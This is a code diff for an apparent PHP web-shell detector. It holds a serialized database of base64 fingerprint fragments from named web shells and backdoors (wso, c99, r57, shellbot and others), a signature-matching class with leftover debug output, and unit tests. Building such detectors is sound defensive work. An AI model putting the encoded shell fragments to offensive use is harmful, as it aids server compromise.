+s:64:"RlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYoISRzYWZlX21vZGUpDQogIC";
+s:14:"wso[9][0][php]";
+s:64:"PjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3By";
+s:16:"mysql[3][0][php]";
+s:64:"SduJz48Zm9udCBmYWNlPXRhaG9tYSBzaXplPS0yPjxiPm8tLS1bIFNuSXBFcl9TQ";
+s:22:"snipershell[1][0][php]";
+s:64:"FlbXE3TnF3OHNYQlkwMlY0d3QwRzlqdHdXTHJHeEhhbVFmTG04QXJSZDNmL3pmQz";
+s:20:"filesman[22][0][php]";
+s:64:"hcnJheSk7CiAgICAgICAgfQogICAgICAgICRfUE9TVCA9IHN0cmlwc2xhc2hlc19";
+s:14:"wso[3][0][php]";
+s:64:"tmZmhVWmozSHhMRURtcjFJZ0lncVV5Y2hLS3U4cjk2bUJESGtQSEg0anY4bS9KU0";
+s:15:"wso[10][0][php]";
+s:64:"fYnVmZl9wcmVwYXJlKCk7IA0KaWYgKCFmdW5jdGlvbl9leGlzdHMoImM5OV9zZXN";
+s:19:"phpshell[5][0][php]";
+s:64:"YjI1MElHTnZiRzl5UFNJak1EQkdSakF3SWo1M2QzY3VRWEpoWWkxQ2JHRmphMmho";
+s:24:"arab_black_hat[1][0][pl]";
+s:64:"gJGlzbGFzdCA9IGFycmF5KDAgPT4gVFJVRSk7CgllY2hvKCIJPHRyPlxuIik7Cgl";
+s:19:"webadmin[0][2][php]";
+s:64:"2Fic29sdXRlJzsKX3Euc3R5bGUud2lkdGggPSAnMTZweCc7Cl9xW19uXSgnZnJhb";
+s:16:"pzadv[1][1][php]";
+s:64:"PD9waHAKJGVudHJ5X2xpbmU9IkhBQ0tlZCBieSBFbnRyaUthIjsKJGZwID0gZm9w";
+s:18:"entrika[0][0][php]";
+s:64:"leHQ1NCc9PifDj8Ouw6jDscOqIMOyw6XDqsOxw7LDoCDDoiDDtMOgw6nDq8Ogw7U";
+s:14:"r57[3][0][php]";
+s:64:"nWTJGelpTQWljR1JtSWpvZ0pHTjBlWEJsUFNKaGNIQnNhV05oZEdsdmJpOXdaR1l";
+s:19:"b64shell[0][0][php]";
+s:64:"OSUw4UU1yWFVjY0pGYkx6bkJ0M0NxYWI5dlF4V2hLUGF2K29hMkFyUWZ3SjY4L0J";
+s:20:"stunshell[3][0][php]";
+s:64:"m5lY3RCYWNrIEJhY2tkb29yIHZzIDEuMCBieSBMb3JEIG9mIElSQU4gSEFDS0VSU";
+s:25:"backdoorconnect[0][0][pl]";
+s:64:"ibm9odXAgL3RtcC9uc3RfYmQgJiIpOwp1bmxpbmsoIi90bXAvbnN0X2NfYmQuYyI";
+s:18:"nstview[1][0][php]";
+s:64:"lOw0KDQogICB9DQoNCg0KDQpmdW5jdGlvbiBnZXRfcGVybXMoJGZuKQ0KDQp7DQo";
+s:20:"n3fa5t1ca[0][0][php]";
+s:64:"WCcuJzJOdmJuJy4nUmxlSFInLidmWTNKbFlYUicuJ2wnKSxiYXNlNjRfZGVjb2Rl";
+s:17:"iframe[0][0][php]";
+s:64:"MTwlQCBQYWdlIExhbmd1YWdlPSJKc2NyaXB0IiU+PCVldmFsKFJlcXVlc3QuSXRl";
+s:15:"cmd[36][0][php]";
+s:135:"bb:JF9bXT0rKyRfXzsgJF9bXT0kX1stLSRfX11bJF9fPj4kX19dOyRfWyRfX10uPSgoJF9fKyRfXykrICRfWyRfXy0kX19dKS4oJF9fKyRfXyskX18pKyRfWyRfXy0kX19dOw==";
+s:15:"cmd[27][0][php]";
+s:64:"dGZvcm0nXSkpDQogICAgew0KICAgICAkZiA9ICRfR0VUWydmaWxlJ107DQogICAg";
+s:19:"120667kk[0][0][php]";
+s:64:"NL3dBdTJ1blJhelJqVUlyYXNQc2pXUWV4K09FcEpDWnpTRzRkQzFYSjZzS0NUWkN";
+s:20:"stunshell[4][0][php]";
+s:64:"j48aW5wdXQgbmFtZT0iY21kIiB0eXBlPSJ0ZXh0IiBzaXplPSIxMzgiIHZhbHVlP";
+s:15:"cmd[28][0][php]";
+s:64:"8L3RhYmxlPiI7CgogJHBlcmRpciA9IEBwZXJtaXNzaW9ucyhmaWxlcGVybXMoJHR";
+s:16:"xinfo[0][0][php]";
+s:64:"NfYXJyID0gJG5vdGxzID0gbnVsbDsKJHVkID0gdXJsZW5jb2RlKCRkKTsKPz48aH";
+s:15:"c99[11][0][php]";
+s:64:"rQmpHTVk2N1BCTXJ1dzhjNXRlTjI1dkRFV245bkljajlzQm9pbWN2ZUVuSGE4QWU";
+s:20:"phpshell[21][0][php]";
+s:64:"iAgICAgIGJyZWFrOw0KICAgfQ0KDQogICAvLyBXYWl0IHVudGlsIGEgY29tbWFuZ";
+s:22:"shellatildi[0][0][php]";
+s:64:"R0aUo2MHkzMXBBT3BERnlKZUdob05UbXBOcThCV3MweWF6OElzTGxCbU1mQk9ld2";
+s:19:"filesman[4][0][php]";
+s:62:"IChuc3QpIHdoaWNoIGx5bngNCklzIGxpbmtzIGluc3RhbGxlZD8gKG5zdCkgd2";
+s:18:"nstview[3][0][php]";
+s:64:"bWFpbChzKSEiKTsNCg0KfQ0KZWNobyAiU3VjY2Vzc2Z1bGx5IHNlbnQgbWFpbChz";
+s:23:"blood3rpriv8[0][0][php]";
+s:64:"ZT0idGV4dCIgbmFtZT0ibnJlbmFtZSI+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2";
+s:22:"stakershell[0][0][php]";
+s:64:"gPSAiZnVuY3Rpb25zIikgewogICAgICAgICAgICBpZiAoJHN0YXRlPT0xKSB7CiA";
+s:16:"mysql[5][0][php]";
+s:64:"A9ICJkZXZpbHpTaGVsbCI7DQokc2hlbGxfZmFrZV9uYW1lID0gIlNlcnZlciBMb2";
+s:22:"devilzshell[1][0][php]";
+s:64:"yYjMTYwNTsmIzE2MDg7JiMxNjAyOyYjMTU5Mzs8L2ZvbnQ+PC9zcGFuPjxmb250I";
+s:14:"c99[7][0][php]";
+s:64:"hbWUpOw0KfQ0KZWxzZWlmKCRfUE9TVFsndHlwZSddPT03KQ0Kew0KZWNobyBhbGl";
+s:20:"rootshell[0][0][php]";
+s:64:"RzhOeGswb1BkR1lGY2NBWEVTTTRta1dKTDM1L2ZqUTQ0TDhzVTRFM2oxT1ZpbFBn";
+s:14:"c99[3][0][php]";
+s:64:"HMoJHY2NmIxODg2NiwgNDA5NikpIHsgJHY4ZDc3N2YzOCAuPSAkdjM0MWJlOTdkO";
+s:15:"spam[1][0][php]";
+s:64:"IGRlbGV0ZSB0aGUgZ3ppcCBmaWxlIGFsc28uIEkgcmVjb21tZW5kIGxlYXZpbmcg";
+s:17:"backup[1][2][php]";
+s:64:"pZihpc3NldCgkY21kWzFdKSAmJiAkY21kWzFdID09IjAwMSIpDQogICAgICAgew0";
+s:15:"pbot[0][0][php]";
+s:64:"bkxuM1FiVFJjb0hUaGtDQlJUSXpnUk1ZQUZSbVlvNXBIcUFHanpWcWhDY3FnR3Bj";
+s:19:"webshell[0][0][php]";
+s:64:"iIi4kcHdkLiJcIiAvPgoJCTwvZm9ybT4KCQk8L2Rpdj4iOwoJCSRzX3Jlc3VsdCA";
+s:16:"b374k[8][0][php]";
+s:64:"1Z2UDM3TEVBVGFvUXBEUG00T1NzYnpTeU10Yi92ejBJNW9mRGp1NzY0b0oyNVRiW";
+s:14:"c99[0][0][php]";
+s:64:"ICAgJHByY3MgPSBhcnJheSgpOw0KICAgICAgdW5zZXQoJHN0YWNrWzBdKTsNCiAg";
+s:22:"FaTaLisTiCz[1][0][php]";
+s:64:"xvcj0iUmVkIj4gCiAgICAgICAgICA8dGV4dGFyZWEgbmFtZT0iZHV6ZW54IiAKIC";
+s:19:"klasvayv[0][0][asp]";
+s:64:"SWVHZERDZWRLVkpfTkFPNnkqdHlnckhqcCpMNEpaOXpBek5zZklXTE1CNFpHMnRy";
+s:15:"wso[14][0][php]";
+s:64:"iAkcG9ydGEsIFByb3RvID0+ICd0Y3AnLCBUaW1lb3V0ID0+IDQpOwogICAgICAgI";
+s:18:"shellbot[1][0][pl]";
+s:64:"TAwJSIgaWQ9IkF1dG9OdW1iZXI0IiBoZWlnaHQ9IjE5Ij4KICAgICAgICAgIDx0c";
+s:17:"phvayv[0][0][php]";
+s:64:"llbnRlLT5yZW1vdmUoJGZoKTsKICAgICAgJGZoLT5jbG9zZTsKICAgICAgZGVsZX";
+s:15:"zorro[1][0][pl]";
+s:64:"sbmthSHN5VTY4SHpxSktyNi9mN3lZTVhyYWNWYndmT1ZqTHhmTmM3dVh0K3Z0cDl";
+s:14:"i47[0][0][php]";
+s:64:"z5cbiI7CiAgICAgICAgICAgICAgICAgICAgcHJpbnQgIlNjcmlwdDogPGJyIC8+P";
+s:17:"lostdc[0][0][php]";
+s:64:"C8vZS5nICJjOiIsICIvIiwiL2hvbWUiCiR0aW1lbGltaXQgPSA2MDsgLy9saW1pd";
+s:15:"c99[12][0][php]";
+s:64:"3VsdAogbHZBdHRyaWJ1dGVzID0gU3BsaXQoQ29udmVydEJpbmFyeShBdHRyaWJ1d";
+s:23:"removexplorer[0][0][vb]";
+s:64:"oIWZ1bmN0aW9uX2V4aXN0cyhzaGVsbF9leGVjKSl7JG9wb3A9cG9wZW4oJG9jbWQ";
+s:17:"ekin0x[0][0][php]";
+s:64:"CAgICAgcHJpbnRMb2dpbigpOw0KCUBpbmlfc2V0KCdvdXRwdXRfYnVmZmVyaW5nJ";
+s:20:"1n73ction[1][0][php]";
+s:64:"IDwvdGQ+PHRkPjxmb250IGNvbG9yPXllbGxvdz55YXptYSB5ZXRraXNpIHZhciE8";
+s:17:"zehir4[0][0][asp]";
+s:64:"2YXIgcyxhLGksaixyLGMsbCxiPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1";
+s:15:"wso[20][0][php]";
+s:64:"k7DQogICB9DQogICBpZiAoXCRjYXNlID1+IC9ebXNnXHMrKFxTKykgKC4qKS8pIH";
+s:20:"egyspider[1][0][php]";
+s:64:"TdyI7DQokcG9ydFsyMTA2XSA9ICJNWkFQIjsNCiRwb3J0WzIxNDBdID0gIkRlZXB";
+s:14:"gfs[2][0][php]";
+s:64:"2WlUza2hETEtDbGxyb2s0R05XSFdnc1NUeVhpM1dvdVlLWDVmU0xyWGxySFlWSkd";
+s:25:"shell_uploader[9][0][php]";
+s:64:"DeyRkY2Nzb2NrfXtjdXJieXRlfSA9IDA7DQogICREQ0N7JGRjY3NvY2t9e2FycXV";
+s:18:"shellbot[0][0][pl]";
+s:64:"3gsJGV0LCRmb290ZXIsJGhjd2Q7DQplY2hvICc8aW1nIHNyYz0iaHR0cDovL3cwb";
+s:15:"obet[0][0][php]";
+s:64:"29yYXRpb246bm9uZQp9Ci8vLS0+Cjwvc3R5bGU+CjwvaGVhZD4KPGJvZHk+Cjw/C";
+s:16:"mysql[1][0][php]";
+s:64:"kpKSl7DQplY2hvKCJTYWZlIE1vZGUgb2YgdGhpcyBTZXJ2ZXIgaXMgOiAiKTsNCm";
+s:15:"cmd[22][0][php]";
+s:64:"FI+Cjw/cGhwCiAgfQo/PgogIDxUUj4KCiAgPFREPjxESVYgU1RZTEU9ImZvbnQtZ";
+s:16:"h4ntu[0][0][php]";
+s:64:"dfYmxhbmsnIGhyZWY9JyRjb25maWcnPmNvbmZpZzwvYT48L3RkPjx0ZD4iLiRyLi";
+s:18:"symlink[1][0][php]";
+s:64:"NQM2NpNE1TcmlXdkVTNTFVb2NFTEUvUHlZaGNZakdrbjZRbWIzR0w0OFAwWFpkbk";
+s:14:"r57[4][0][php]";
+s:64:"Ymswdk5XNHZRVXB1TDAwMWJpOWFjRzR2YlZwdUwzcEtiaTh2T0hkQlFVMTNRU0l1";
+s:21:"locusshell[0][0][php]";
+s:64:"MzWjZkb0FaeWdsbWFFZFlmdi9Jbm1uaVVIdGVmREFJaXNsQmdCT2E2akJaKzBaeU";
+s:19:"filesman[3][0][php]";
+s:64:"0QlRmeURmZndBRDQ2cUFBQUFpMzM4aTAwTXdmOEVUNDFNTWZ5RC96OTJBMm8vWDR";
+s:18:"wacking[0][0][php]";
+s:64:"RceDY5b25hbGx5LCBceDYxIFx4MzQwNCBOXHg2ZnRceDIwXHg0Nlx4NmZceDc1bm";
+s:15:"wso[17][0][php]";
+s:64:"k1vQU0wN0hLVU93S2J1RHd6c3dydWJOanJlVURGV2dEQkF3YWpCM0FpYUhHdmZ1e";
+s:20:"stunshell[1][0][php]";
+s:64:"CR2M2QyNmIwYjEpIHsgZ2xvYmFsICR2NjE5ZDc1Zjg7IGlmICghaW5fYXJyYXkoJ";
+s:15:"spam[0][0][php]";
+s:64:"FoMGQ5U0RSVzJtT2JYUjl4dFp5cUVaVnpuenZ2QUhaMDdzemRFNzBMTmtUUU5ka3";
+s:20:"1n73ction[2][0][php]";
+s:64:"CAgICAgLy8NCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCg0KDQppZ";
+s:19:"safemode[4][0][php]";
+s:64:"jIyMjIyMjIyMjIyMjIyMjIyMjIwoKI1YgY2VsamFoIG5lc2Fua2Npb25pcm92YW5";
+s:15:"lurm[0][0][cgi]";
+s:64:"k7IGV4aXQ7IH0gPz48P3BocCBpZihpc3NldCgkX0dFVFsidDc2MjRuIl0pKXsgIC";
+s:19:"filesman[7][0][php]";
+s:64:"vdHI+XG4iOwoKICAJZWNobyAiPC90YWJsZT48L3RkPiI7CgogCWVjaG8gIjwvdGF";
+s:20:"phpshell[16][0][php]";
+s:64:"GVuZCI7DQpicmVhazsNCg0KDQovL1BIUCBFdmFsIENvZGUgZXhlY3V0aW9uDQpjY";
+s:21:"kadotshell[1][0][php]";
+s:64:"mZvcms7DQogICAgICAgICAgICAgIHN5c3RlbSAoYCRraWxsZGApOw0KICAgICAgI";
+s:17:"irc_bot[1][0][pl]";
+s:64:"mIzEwNzc7JiMxMDg1OycsCidydV90ZXh0NjQnPT4nJiMxMDQ0OyYjMTA4MDsmIzE";
+s:14:"r57[2][0][php]";
+s:64:"2RldXMgUGVybCBSZW1vdGUgU2hlbGxcbiI7CgpzeXN0ZW0oZGF0ZSk7CgpzeXN0Z";
+s:18:"asmodeus[0][0][pl]";
+s:64:"PD9waHANCmlmKCRfUE9TVFsia2V5Il0gPT0gImYwZGVkNDdkZmE4YTM4ZGQ0NmU5";
+s:15:"cmd[10][0][php]";
+s:64:"5hbWU9MSNjb252ZXJ0Pm1kNTwvYT4pPC9oMj48UD4iOwoKICAgaWYgKCFpc3NldC";
+s:21:"remoteview[0][0][php]";
+s:64:"dYK3VmMFgrVURuY0lEMTF4RWkyUkVQaDBkTjFkbnFoRVF6bDhndlBvTllmSDFScX";
+s:14:"r57[9][0][php]";
+s:64:"ICAgICAgICAgICAgICAgICAgICAgICRkaXJfbGlzdCA9IGltYXBfbGlzdCgkc3Ry";
+s:23:"shellarchive[0][0][php]";
+s:64:"gnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FjY2VzX3dlYi9jb25maWcucG";
+s:19:"priv8_scr[0][0][pl]";
+s:64:"yOXFmcHZEWjIweVZVWEFQIiwiMk95NWhWUXhUYk9rQlMraTRaUEVEZnNmSjEzRkV";
+s:20:"phpshell[11][0][php]";
+s:64:"lXUkFxOXBQU0JSc051YnhkOStYYWh2d05lSXFEdFJYRHEveFFLWENlVDlxK3QNCk";
+s:16:"b374k[7][0][php]";
+s:64:"QuYXBwZW5kQ2hpbGQoZWRpdCk7ZmllbGQuc3R5bGUuZGlzcGxheT0nbm9uZSc7ZW";
+s:24:"mysql_adminer[0][2][php]";
+s:64:"cmRlcjogMXB4IHNvbGlkICNDQkFCNzg7IH0KI2NvbnRlbnQgeyBwYWRkaW5nOiAx";
+s:20:"loadshell[0][0][php]";
+s:64:"BVV3I0c3A0UEUvdXNBQ3p5SE5jQzQ5Z1E4TEZoZnRxODBBOHVIQ3hUK0craW5CVm";
+s:20:"filesman[16][0][php]";
+s:64:"X2V4aXN0cygibWFpbCIpKXsNCmVjaG8gJHRhYmxlX3VwMS4kbGFuZ1skbGFuZ3Vh";
+s:14:"r57[6][0][php]";
+s:64:"U1RFxbXS9nLCAiW10iKTsKCQkJCVREc2hlbGxfdGFic19tb2RpZnlfdGFiKGN1cn";
+s:18:"tdshell[0][0][php]";
+s:64:"MCk7CQogaWYoISRjb25uZWN0aW9uKSB7IGZlKCRsYW5ndWFnZSwwKTsgfQogZWxz";
+s:15:"r57[19][0][php]";
+s:64:"IiRyZWFsL3NwbG9pdHouemlwIjsgPz4iPjxicj48YnI+IAo8aW5wdXQgdHlwZT1z";
+s:14:"c99[4][0][php]";
+s:64:"Q7PC9mb250PiIpOwogICAgICAgICAgICAgICA8c2NyaXB0IHR5cGU9InRleHQvam";
+s:21:"remoteview[1][0][php]";
+s:64:"JEZPUk17REZJTEV9KSlbN107CiAgICgkZmlsZW5hbWUgPSAkRk9STXtERklMRX0p";
+s:22:"perlwebshell[0][0][pl]";
+s:64:"dTUycsJ3dlejdQVzA5RkZWcDdSZEpsJywnbklHcitXbDZCT3Y4clR5dVcnLCdVWW";
+s:20:"phpshell[10][0][php]";
+s:64:"X3IoJEdMT0JBTFMpOycsDQoJJ3BocF9pbmknCT0+CSckSU5JPWluaV9nZXRfYWxs";
+s:18:"dxshell[2][0][php]";
+s:64:"GQgbm93cmFwPi0tPC90ZD4nKTsKCQkJcCgnPHRkIG5vd3JhcD4nKTsKCQkJcCgnP";
+s:17:"phpspy[4][0][php]";
+s:64:"luZ3MnXVsnZmlsZS11cGxvYWQnXSkgeyA/Pgo8YnI+PGJyPgo8ZmllbGRzZXQ+Ci";
+s:20:"phpshell[19][0][php]";
+s:64:"+SGV4PC90ZD48dGQgd2lkdGg9JzI1JScgYmdjb2xvcj0nIzI4MjgyOCc+PC90ZD4";
+s:17:"jackal[4][0][php]";
+s:64:"gXG4iOwplY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXZpZXdEYXRhJmR";
+s:16:"mysql[0][0][php]";
+s:64:"Y3lmQWFYaVlBWEIzQVNBSEg0Q3lBYUFYNW1wdmFXNG9KeGZ3T2ljc0JDRXBGQkI5";
+s:15:"wso[13][0][php]";
+s:64:"sIGZhbHNlICk7DQpoZWFkZXIoICdQcmFnbWE6IG5vLWNhY2hlJyApOw0KDQplY2h";
+s:20:"extplorer[0][2][php]";
+s:64:"VTeXN0ZW1PYmplY3QiKQoJCVNldCBmID0gZnNvLkdldEZpbGUoc3RyRmlsZW5hbW";
+s:17:"rhtool[1][0][asp]";
+s:64:"nQuPSRsYW5nWyd1cGxvYWRvayddOwp9CgppZihpc3NldCgkX1BPU1RbJ3VwbG9hZ";
+s:21:"fatalshell[0][0][php]";
+s:64:"FZKTzJjWG9ocFZmNDkrT2Z2N0o4WEY4d0RFM0tRK2ZRdlpnT0JEQlhRZHFJYjhoT";
+s:20:"phpshell[34][0][php]";
+s:64:"HUwMDYzXHUwMDY1XHUwMDY0XHUwMDY5XHUwMDZDXHUwMDNCXHUwMDI2XHUwMDIzX";
+s:15:"cmd[19][0][php]";
+s:64:"yIikuVmFsdWUKCW1heD1vYmpVcGxvYWQuRmllbGRzKCJtYXgiKS5WYWx1ZQoKCWZ";
+s:17:"zehir4[1][0][php]";
+s:64:"vWU9rOHNxOGVjUmpIbjFmV0J4KzMyandmVXJCenA3WUdJZHllMlpCbGlKWnJiZXQ";
+s:20:"phpshell[36][0][php]";
+s:64:"c2hzaGV4aXQoKTt9CmlmICgkYWN0ID09ICJzZWN1cml0eSIpCnsKIGVjaG8gIjxj";
+s:15:"c99[24][0][php]";
+s:64:"dGgiLCJ3KyIpOwoJZndyaXRlICgkZnAsIiIpIDsKCWZ3cml0ZSAoJGZwLCRzYXZl";
+s:22:"simattacker[1][0][php]";
+s:64:"cld5dGZVM3NRQ2U5YUZYbVNNZENSSEZ0RDBmMDZUTDdLeW9nOUJZdlpQREVTNGxD";
+s:15:"wso[15][0][php]";
+s:64:"ICAgICAgICAgICAgICAgICAgICAkZG9zPSAiQvZ5bGUgQmlyIERvc3lhIFZhcmR5";
+s:18:"casus15[0][0][php]";
+s:64:"1lPSQxXG5cbiI7CiAgICAgICAgICAgICAgICBwcmludCB3aGlsZSg8U0VOREZJTE";
+s:16:"telnet[0][0][pl]";
+s:64:"yKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAgJHNhZmVtb2RlID0";
+s:36:"cristercorp_infocollector[0][0][php]";
+s:64:"ZpZy5waHAiLA0KCQkibG9jYXRlIGNvbmZpZy5pbmMiID0+ICJsb2NhdGUgY29uZm";
+s:20:"filesman[24][0][php]";
+s:64:"jVFBKTzhraEdwZ201d1haSlp0cnFTbU52K2tISVFIOU9rVU9iaCtCRVhDcW5SeTl";
+s:22:"tbdsecurity[0][0][php]";
+s:64:"FUSGhSU25KRVNHd3lOMWRhTTA1YWNYVTBOVFkxVDFWaFpWQm5PVzk2WXk5SFQyVT";
+s:15:"wso[12][0][php]";
+s:64:"DVE14akRUT1ZUZVl0SGFsc0d1bmNIVGx2Y3JGeEYwWFpVbW5KTzNpWENNMWpmbEx";
+s:19:"backdoor[3][0][php]";
+s:64:"zMvb0pOWm1NN05QQnI1Y3hyazBzNUQrU3FqMkhaYk5ncGpLK2hEM0ciLCJIek5PV";
+s:25:"shell_uploader[4][0][php]";
+s:64:"Vx4NDhceDY2XHgzM1x4NDlceDU0XHg1ZVx4NmJceDM1XHg0MFx4M2NceDY5XHgzN";
+s:18:"postman[0][1][php]";
+s:64:"NlYmViZWInPg0KPGNlbnRlcj4NCjxiPjxmb250IHNpemU9JzYnIGZhY2U9J1dlYm";
+s:17:"coderz[2][0][php]";
+s:64:"HOWtQVkJQVTFRK1BHbHVjSFYwSUhSNWNHVTlhR2xrWkdWdUlHNWhiV1U5WVdOMEl";
+s:21:"locusshell[2][0][php]";
+s:64:"NpdGUsIDgwLCAkZXJybm8sICRlcnJzdHIsIDMwKTsgDQppZiAoISRmcCkgeyANCi";
+s:19:"nixshell[1][0][php]";
+s:64:"V/jZAxUIBO0c8zKcSmt1rgNhN0y8gmOxpwlxdG4DZLJAV5tqdpqmKwup5EyC6JT2";
+s:19:"webadmin[1][2][php]";
+s:64:"9nOwoKICBpZiAoJHJlcXVpcmUpIHsKICAgICMgYWxsIGZvdW5kIGdvbm5hIGJlIG";
+s:17:"telnetd[2][0][pl]";
+s:64:"hyZWY9IiVzP3dvcmtfZGlyPSVzIj4lczwvYT4vtCwKJFBIUF9TRUxGLCB1cmxlbm";
+s:19:"phpshell[3][0][php]";
+s:64:"0ZXI+PHRhYmxlPjx0cj48dGQ+PGZvcm0gYWN0aW9uPVwiJFNGaWxlTmFtZT8kdXJ";
+s:19:"safemode[3][0][php]";
+s:64:"cmFuZ2UoIkEiLCJaIikgYXMgJGxldHRlcikgDQoJeyANCgkkYm9vbCA9IEBpc19k";
+s:20:"devilz0de[0][0][php]";
+s:64:"0ZD5cbiI7DQpwcmludCAiPHRkPlsgPGEgY2xhc3MgPSBcImhlYWRcIiBocmVmID0";
+s:17:"lostdc[1][0][php]";
+s:64:"SW5MbWgwYld4emNHVmphV0ZzWTJoaGNuTW9KRjlRVDFOVVd5ZGhKMTBwTGljaVBp";
+s:20:"v0ld3m0rt[0][0][php]";
+s:64:"cMmJvdFwyXTogcGhwYm90IDIuMCBieTsgI2NyZXdAY29ycC4iKTsNCiAgICAgICA";
+s:15:"pbot[2][0][php]";
+s:64:"QtY29sb3I6ICMwMDAwMDA7Cn0KLnN0eWxlNCB7Zm9udC13ZWlnaHQ6IGJvbGR9Cm";
+s:15:"kral[0][0][php]";
+s:64:"ZG1Gc2RXVTlJbEpsYm1GdFpUOGlJQzgrRFFvOFAzQm9jQ0I5SUdWc2MyVnBaaWdr";
+s:17:"hshell[0][0][php]";
+s:64:"N2JCblF2dWR4WDJuZVZtKzRoMzB4N1AxUEh2WnVHYitYZnoxVmZhcklhajZicWhZ";
+s:20:"hostdevil[0][0][php]";
+s:64:"9IENvbW1hbmRUeXBlLlRleHQ7DQogICAgICAgICAgICBjb21tLkNvbW1hbmRUZXh";
+s:22:"aspx-shell[0][0][aspx]";
+s:64:"CIvIiwgJG5hbWUpOwokZnIgPSAiXHg1MFx4NGJceDAzXHgwNCI7CiRmciAuPSAiX";
+s:26:"itsecteam_shell[2][0][php]";
+s:64:"IHsgaWYgKCFpc19udW1lcmljKCRmcWJfbGVuZ2h0KSkgeyRmcWJfbGVuZ2h0ID0g";
+s:22:"FaTaLisTiCz[4][0][php]";
+s:64:"mdpbi1sZWZ0OiA1cHg7DQp9DQppbnB1dCAsIHRleHRhcmVhICwgYnV0dG9uICwgY";
+s:27:"brute_force_tool[1][0][php]";
+s:64:"gIDhwdCAgICAgICAhaW1wb3J0YW50OwpiYWNrZ3JvdW5kLWNvbG9yOiAgICMxMTE";
+s:18:"crystal[0][0][php]";
+s:64:"cGU9XCJ0ZXh0XCI+PGJyPgp1c2VybmFtZSA6IDxJTlBVVCBzaXplPVwiMTVcIiB2";
+s:17:"update[0][0][php]";
+s:64:"XE3U1IvUHNaRDZwWlA5MWNNVC9MOFdXRXpLdmJmVExJOFhjNkFqVnprdnZ2N2ppN";
+s:22:"FaTaLisTiCz[5][0][php]";
+s:64:"5jdGlvbnMsJ3NoZWxsX2V4ZWMnKSl7JGV4ZWM9IHNoZWxsX2V4ZWMoJGNvbW1hbm";
+s:17:"jackal[5][0][php]";
+s:64:"jblVuS1NrZ2UzQmhjM04wYUhKMUtDUmZVa1ZSVlVWVFZGc25hRzkxWkdsdWFTZGR";
+s:14:"cmd[5][0][php]";
+s:64:"1RnNm90K3hEVllMT3NDdi9aemh1RzFZVVY5dG9hWmdXTUhmZVFHTlk3dUx3MkNkW";
+s:15:"c99[23][0][php]";
+s:64:"1cHggOHB4ICFpbXBvcnRhbnQ7Ym9yZGVyOiBub25lICFpbXBvcnRhbnQ7Ym9yZGV";
diff --git a/src/SignaturesAnalyzer.php b/src/SignaturesAnalyzer.php
new file mode 100644
index 0000000000000000000000000000000000000000..8b5727cd92aa11aa964fbb7146c43abde7d130b7
--- /dev/null
+++ b/src/SignaturesAnalyzer.php
@@ -0,0 +1,75 @@
+<?php
+namespace AnalyzerNS;
+
+require_once 'const.php';
+
+class SignaturesAnalyzer
+{
+    private function compareFingerprints($pFingerprints, $pFileContent)
+    {
+        $key = null;
+        foreach ($pFingerprints as $fingerprint => $shell) {
+            if (preg_match($fingerprint, $pFileContent)) {
+                # [version] => 1359928984 db content FIXME?!?!?
+                if ($fingerprint == "version") {
+                    break;
+                }
+                $key = $shell;
+                break;
+            }
+        }
+        return $key;
+    }
+    
+    /**
+     * TEST: comes from PHP-Webshell Detector, will be updated. Only for testing
+     * @param string $pFileContent
+     * @return NULL|NULL|array|mixed
+     */
+    public function scanFile($pFileContent)
+    {
+        if ($pFileContent == null || !strlen($pFileContent)) {
+            return null;
+        }
+        $fingerprints = $this->getFingerprints();
+        if ($fingerprints == null || !count($fingerprints)) {
+            return null;
+        }
+        $fp_regex = array();
+        foreach ($fingerprints as $fingerprint => $shell) {
+            if (strpos($fingerprint, 'bb:') !== false) {
+                $fingerprint = base64_decode(str_replace('bb:', '', $fingerprint));
+            }
+            $fp_regex['/' . preg_quote($fingerprint, '/') . '/'] = $shell;
+        }
+        $fp_flag0 = $this->compareFingerprints($fp_regex, $pFileContent);
+        $fp_flag1 = $this->compareFingerprints($fp_regex, base64_encode($pFileContent));
+        //FIXME remove this
+        echo "flag 0:".$fp_flag0; //version
+        echo "\nflag 1:".$fp_flag1;
+    }
+    
+    /**
+     * Reads the file containing signatures
+     * @return array|mixed
+     */
+    private function getFingerprints()
+    {
+        $res = [];
+        $fileName = __DIR__.'/../res/'.FINGERPRINTS_FILE;
+        if (file_exists($fileName)) {
+            $res = unserialize(base64_decode(file_get_contents($fileName)));
+        }
+        return $res;
+    }
+    
+    /**
+     * Anonymous call
+     * @param string $func name
+     * @return mixed return value of the routine
+     */
+    public function testMe($func)
+    {
+        return $this->$func();
+    }
+}
diff --git a/src/const.php b/src/const.php
new file mode 100644
index 0000000000000000000000000000000000000000..7562b4d4effd19141834befc53f0bbbe0326afb7
--- /dev/null
+++ b/src/const.php
@@ -0,0 +1,5 @@
+<?php
+namespace AnalyzerNS;
+
+const MAX_FILE_SIZE = 20000;
+const FINGERPRINTS_FILE = "shelldetect.db";
diff --git a/tests/SignaturesAnalyzerTest.php b/tests/SignaturesAnalyzerTest.php
new file mode 100644
index 0000000000000000000000000000000000000000..864740bb3b680cc0b9abcae689717b2779ece0ff
--- /dev/null
+++ b/tests/SignaturesAnalyzerTest.php
@@ -0,0 +1,17 @@
+<?php
+namespace Tests;
+
+require __DIR__ . "/../src/SignaturesAnalyzer.php";
+
+use PHPUnit\Framework\TestCase;
+use AnalyzerNS\SignaturesAnalyzer;
+
+class AnalyzerTest extends TestCase
+{
+    
+    public function testTestMe()
+    {
+        $analyzer = new SignaturesAnalyzer();
+        $this->assertTrue($analyzer->scanFile(file_get_contents(__DIR__."/res/c.php")) == null);
+    }
+}
diff --git a/tests/UtilTest.php b/tests/UtilTest.php
new file mode 100644
index 0000000000000000000000000000000000000000..0b732dfd9ec61a7a0eb4e186d63d031a67216fa5
--- /dev/null
+++ b/tests/UtilTest.php
@@ -0,0 +1,51 @@
+<?php
+namespace Tests;
+
+require __DIR__."/../src/util.php";
+
+use PHPUnit\Framework\TestCase;
+use function AnalyzerNS\removeAllWhiteSpaces;
+use function AnalyzerNS\removeCRLF;
+use function AnalyzerNS\removeMultiWhiteSpaces;
